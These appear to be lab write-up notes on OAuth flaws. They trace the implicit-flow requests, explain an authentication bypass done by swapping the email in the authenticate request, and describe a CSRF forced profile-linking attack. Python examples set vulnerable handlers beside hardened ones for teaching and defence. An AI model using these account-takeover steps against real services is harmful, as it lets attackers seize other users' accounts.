Lab - 1: Authentication bypass via OAuth implicit flow (A)
This lab uses an OAuth service to allow users to log in with their social media account. Flawed validation by the client application makes it possible for an attacker to log in to other users' accounts without knowing their password. To solve the lab, log in to Carlos's account. His email address is carlos@carlos-montoya.net. You can log in with your own social media account using the following credentials: wiener:peter.
Flow of OAuth process for this lab
GET /my-account
The application redirects to /social-login.
GET /social-login
-> the response contains a meta refresh tag that sends the browser to the OAuth service:
<meta
http-equiv="refresh"
content="3;url=https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/auth?client_id=quzs4k6iz0iqzfchxka1k&redirect_uri=https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback&response_type=token&nonce=-1853408548&scope=openid%20profile%20email"
/>
The browser then makes the following GET request to the OAuth server:
GET /auth?client_id=quzs4k6iz0iqzfchxka1k&redirect_uri=https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback&response_type=token&nonce=-1853408548&scope=openid%20profile%20email HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
It has
The OAuth server redirects to
GET /interaction/SSmbqLjw_N9qhTQEjMUyQ HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
and the response from the OAuth server contains a form with a Continue button:
<form
autocomplete="off"
action="/interaction/cXAbo8_Osu7Vjt44iUQyP/confirm"
method="post"
>
<button autofocus type="submit" class="login login-submit">Continue</button>
</form>
Submitting the form makes a POST request to the OAuth service:
POST /interaction/cXAbo8_Osu7Vjt44iUQyP/confirm HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
This redirects to https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/auth/cXAbo8_Osu7Vjt44iUQyP,
which in turn redirects to the application's callback URL, with the access token in the URL fragment:
https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback#access_token=cak10bhH032h6tHMqRXXF-J7PuuHMNB0Mf_cBDrA4G1&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email
The application receives this at
GET /oauth-callback HTTP/1.1
Host: 0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net
The application's response parses the URL to extract the data, like this:
Inside the above code, fetching
https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/me
returns the required user data:
{
"sub": "wiener",
"name": "Peter Wiener",
"email": "wiener@hotdog.com",
"email_verified": true
}
Finally, it makes a POST /authenticate request to the application, and the user is logged in:
POST /authenticate HTTP/1.1
Host: 0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net
...
{"email":"wiener@hotdog.com","username":"wiener","token":"cak10bhH032h6tHMqRXXF-J7PuuHMNB0Mf_cBDrA4G1"}
To solve the lab, change the email to Carlos's email.
If the request was caught with Intercept on, or is sitting in the POST request box, right-click > Request in browser > In original session, then copy the URL and paste it into the browser.
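The root cause is that the client application builds the session from the email in the POST /authenticate body instead of from what the OAuth server says the token proves. The following is an added example, not code from the lab or from PortSwigger; the /me endpoint is replaced by an in-memory table (FAKE_USERINFO, fetch_userinfo), and the tokens and request bodies are constructed to match the shape shown in the notes above.

```python
"""Added example (not from the lab): the flawed /authenticate handler beside a
hardened one. The OAuth server's /me (userinfo) endpoint is a stand-in table."""

import json

# Constructed stand-in for GET https://<oauth-server>/me:
# access token -> the claims the OAuth server would return for it.
FAKE_USERINFO = {
    "tok-wiener-0001": {
        "sub": "wiener",
        "name": "Peter Wiener",
        "email": "wiener@hotdog.com",
        "email_verified": True,
    },
}


def fetch_userinfo(access_token):
    """Stand-in for calling /me with a Bearer token. Returns the claims for a
    known token, or None for an unknown or expired one."""
    return FAKE_USERINFO.get(access_token)


def authenticate_vulnerable(raw_body):
    """Mirrors the flaw in the lab: the token is only checked for validity, and
    the session is then created from the email in the body, which the user
    controls. The identity the token actually proves is never consulted."""
    body = json.loads(raw_body)
    if fetch_userinfo(body["token"]) is None:
        return None
    return {"logged_in_as": body["email"]}


def authenticate_hardened(raw_body):
    """Fixed handler: identity comes only from the claims the OAuth server
    returns for the token. Nothing in the request body decides who you are."""
    body = json.loads(raw_body)
    claims = fetch_userinfo(body.get("token", ""))
    if claims is None:
        return None                  # unknown / expired token
    if not claims.get("email_verified"):
        return None                  # do not map an unverified address to a local account
    # Defence in depth: a body email that disagrees with the token's owner is
    # tampering, so refuse rather than silently "correcting" it.
    if "email" in body and body["email"] != claims["email"]:
        return None
    return {"logged_in_as": claims["email"]}


if __name__ == "__main__":
    # Constructed request: the attacker's own valid token with another user's email.
    tampered = json.dumps({
        "email": "carlos@carlos-montoya.net",
        "username": "wiener",
        "token": "tok-wiener-0001",
    })
    print("vulnerable:", authenticate_vulnerable(tampered))
    print("hardened:  ", authenticate_hardened(tampered))
```

The hardened version ignores the client-supplied username and email entirely; the only thing the body is allowed to contribute is the token, and the token is resolved to an identity server-side. Rejecting a mismatch instead of overriding it also gives you a log line worth alerting on.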
Lab - 2: Forced OAuth profile linking (P)
This lab gives you the option to attach a social media profile to your account so that you can log in via OAuth instead of using the normal username and password. Due to the insecure implementation of the OAuth flow by the client application, an attacker can manipulate this functionality to obtain access to other users' accounts. To solve the lab, use a CSRF attack to attach your own social media profile to the admin user's account on the blog website, then access the admin panel and delete Carlos. The admin user will open anything you send from the exploit server and they always have an active session on the blog website. You can log in to your own accounts using the following credentials:
Blog website account: wiener:peter
Social media profile: peter.wiener:hotdog
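Forced profile linking works because the application completes the "attach profile" flow for whichever logged-in browser is sent to the callback, with nothing tying that callback to the session that started the flow. The standard fix is an unguessable state value generated when the link flow begins, stored in the session, sent to the OAuth server, and required to match (once) on the callback. The code below is an added example, not the lab's or PortSwigger's code; the session is a plain dict and begin_link / complete_link are hypothetical names.

```python
"""Added example (not from the lab): binding the OAuth profile-linking flow to
the session that initiated it with a single-use state value."""

import hmac
import secrets


def begin_link(session):
    """Called when the user clicks "attach social profile". Returns the state
    value that must be appended to the /auth redirect as &state=..."""
    state = secrets.token_urlsafe(32)
    session["oauth_link_state"] = state      # session is a dict standing in for server-side session storage
    return state


def complete_link_vulnerable(session, callback_params):
    """Mirrors the lab's flaw: any callback reaching a logged-in browser is
    accepted, so an attacker-crafted callback URL links the attacker's profile."""
    return "code" in callback_params         # no check that this session asked for a link


def complete_link(session, callback_params):
    """Hardened callback: accept only if the callback carries the exact state
    this session issued, and consume it so the URL cannot be replayed."""
    expected = session.pop("oauth_link_state", None)
    received = callback_params.get("state")
    if expected is None or received is None:
        return False                         # flow was never started here, or state is missing
    if not hmac.compare_digest(expected, received):
        return False                         # callback was minted for a different session
    return "code" in callback_params         # safe to go on and attach the profile


if __name__ == "__main__":
    victim = {}                              # constructed: admin's session, never started a link flow
    forged = {"code": "attacker-code", "state": "anything"}   # constructed attacker callback
    print("vulnerable accepts forged callback:", complete_link_vulnerable(victim, forged))
    print("hardened accepts forged callback:  ", complete_link(victim, forged))
    own = {}
    s = begin_link(own)
    print("hardened accepts own callback:     ", complete_link(own, {"code": "c", "state": s}))
```

Because the state is popped on first use, a callback URL that was valid once is rejected if it is opened again, and a callback generated in the attacker's own session never matches the value stored in the victim's session.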